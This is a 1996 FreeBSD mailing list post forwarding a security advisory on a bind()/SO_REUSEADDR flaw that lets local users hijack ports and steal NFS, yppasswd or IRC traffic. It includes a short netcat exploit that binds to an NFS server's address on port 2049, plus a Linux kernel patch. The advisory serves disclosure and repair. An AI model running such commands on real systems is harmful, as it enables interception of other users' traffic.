From owner-freebsd-hackers  Wed Jan 31 14:15:12 1996
Return-Path: owner-hackers
Received: (from root@localhost)
          by freefall.freebsd.org (8.7.3/8.7.3) id OAA16878
          for hackers-outgoing; Wed, 31 Jan 1996 14:15:12 -0800 (PST)
Received: from gvr.win.tue.nl (root@gvr.win.tue.nl [131.155.210.19])
          by freefall.freebsd.org (8.7.3/8.7.3) with SMTP id OAA16871
          for <FreeBSD-hackers@freefall.cdrom.com>; Wed, 31 Jan 1996 14:15:06 -0800 (PST)
Received: by gvr.win.tue.nl (8.6.10/1.53)
    id XAA15623; Wed, 31 Jan 1996 23:14:59 +0100
From: guido@gvr.win.tue.nl (Guido van Rooij)
Message-Id: <199601312214.XAA15623@gvr.win.tue.nl>
Subject: bind() bug in almost all OS'es
To: FreeBSD-hackers@freefall.FreeBSD.org (FreeBSD-hackers)
Date: Wed, 31 Jan 1996 23:14:58 +0100 (MET)
X-Mailer: ELM [version 2.4 PL24]
Content-Type: text
Sender: owner-hackers@FreeBSD.ORG
Precedence: bulk


I posted this on secuirty. This is severe in my eyes.
Fortunately there is still the concept of reserved ports but
it does not help sniffing nfs ports :-(

-Guido
Aleph's K-Rad GECOS Field wrote:
> From owner-freebsd-security@freefall.freebsd.org  Wed Jan 31 16:00:48 1996
> X-Authentication-Warning: suburbia.net: majordom set sender to owner-best-of-security using -f
> Date: Tue, 30 Jan 1996 15:18:21 -0800 (PST)
> From: "Aleph's K-Rad GECOS Field" <aleph1@underground.org>
> To: linux-security@tarsier.cv.nrao.edu
> cc: linux-alert@tarsier.cv.nrao.edu, bugtraq@crimelab.com,
>         best-of-security@suburbia.net
> Subject: BoS: bind() Security Problems
> Message-ID: <Pine.LNX.3.91.960130151057.4068A-100000@underground.org>
> MIME-Version: 1.0
> Content-Type: TEXT/PLAIN; charset=US-ASCII
> Reply-To: nobody@mail.uu.net
> Sender: owner-security@FreeBSD.org
> Precedence: bulk
> 
> 
> 		System Call: bind()
>   Affected Operating System: Linux, SunOS, FreeBSD, BSDI, Ultrix
> 			     Probably others.
> 		Requirement: account on system.
> 	Security Compromise: Stealing packets from
> 			     nfsd, yppasswd, ircd, etc.
> 		    Credits: *Hobbit* <hobbit@avian.org>
> 			     bitblt <bitblt@infosoc.com>
> 			     Aleph One <aleph1@underground.org>
> 	 	   Synopsis: bind() does not properly check
> 			     to make sure there is not a socket
> 			     already bound to INADDR_ANY on the same
> 			     port when binding to a specific address.
> 
> 	On most systems, a combination of setting the SO_REUSEADDR
> socket option, and a call to bind() allows any process to bind to
> a port to which a previous process has bound width INADDR_ANY. This
> allows a user to bind to the specific address of a server bound to
> INADDR_ANY on an unprivileged port, and steal its udp packets/tcp
> connection.
> 
> Exploit:
> 
> 	Download and compile netcat from ftp://ftp.avian.org/src/hacks/nc100.tgz
> Make sure an nfs server is running:
> 
> w00p% netstat -a | grep 2049
> udp       0      0 *.2049           *.*               LISTEN
> 
> Run netcat:
> 
> w00p% nc -v -v -u -s 192.88.209.5 -p 2049
> listening on [192.88.209.5] 2049 ...
> 
> Wait for packets to arrive.
> 
> Fix:
> 
> 	Linux: A patch was been sent to Linus and Alan Cox. It should be
> included with 1.3.60. My original patch (included bellow) allows for
> binds from the same uid, as some virtual hosting software like modified
> httpds, and ftpds, may break otherwise.
> 
> 	Alan didnt like this, so all bind to the same port will
> not be allowed in newer kernels. You should be able to easily adapt
> this patch or Alan's patch to 1.2.13 without much trouble.
> 
> 	Others: Pray to your vendors.
> 
> --- begin patch ---
> 
> 
> diff -u --recursive --new-file linux-1.3.57/net/ipv4/af_inet.c linux/net/ipv4/af_inet.c
> --- linux-1.3.57/net/ipv4/af_inet.c	Mon Dec 25 20:03:01 1995
> +++ linux/net/ipv4/af_inet.c	Tue Jan 16 19:46:28 1996
> @@ -46,6 +46,8 @@
>   *		Germano Caronni	:	Assorted small races.
>   *		Alan Cox	:	sendmsg/recvmsg basic support.
>   *		Alan Cox	:	Only sendmsg/recvmsg now supported.
> + *		Aleph One	:	Rogue processes could steal packets
> + *					from processes bound to INADDR_ANY.
>   *
>   *		This program is free software; you can redistribute it and/or
>   *		modify it under the terms of the GNU General Public License
> @@ -899,6 +901,12 @@
>  			
>  			if (sk2->num != snum) 
>  				continue;		/* more than one */
> +			if ((sk2->rcv_saddr == 0 || sk->rcv_saddr == 0) &&
> +				current->euid != sk2->socket->inode->i_uid)
> +			{
> +					sti();
> +					return(-EADDRINUSE);
> +			}
>  			if (sk2->rcv_saddr != sk->rcv_saddr) 
>  				continue;	/* socket per slot ! -FB */
>  			if (!sk2->reuse || sk2->state==TCP_LISTEN) 
> 
> 
> Aleph One / aleph1@underground.org
> http://underground.org/
> KeyID 1024/948FD6B5 
> Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 
> 
> 
> 
>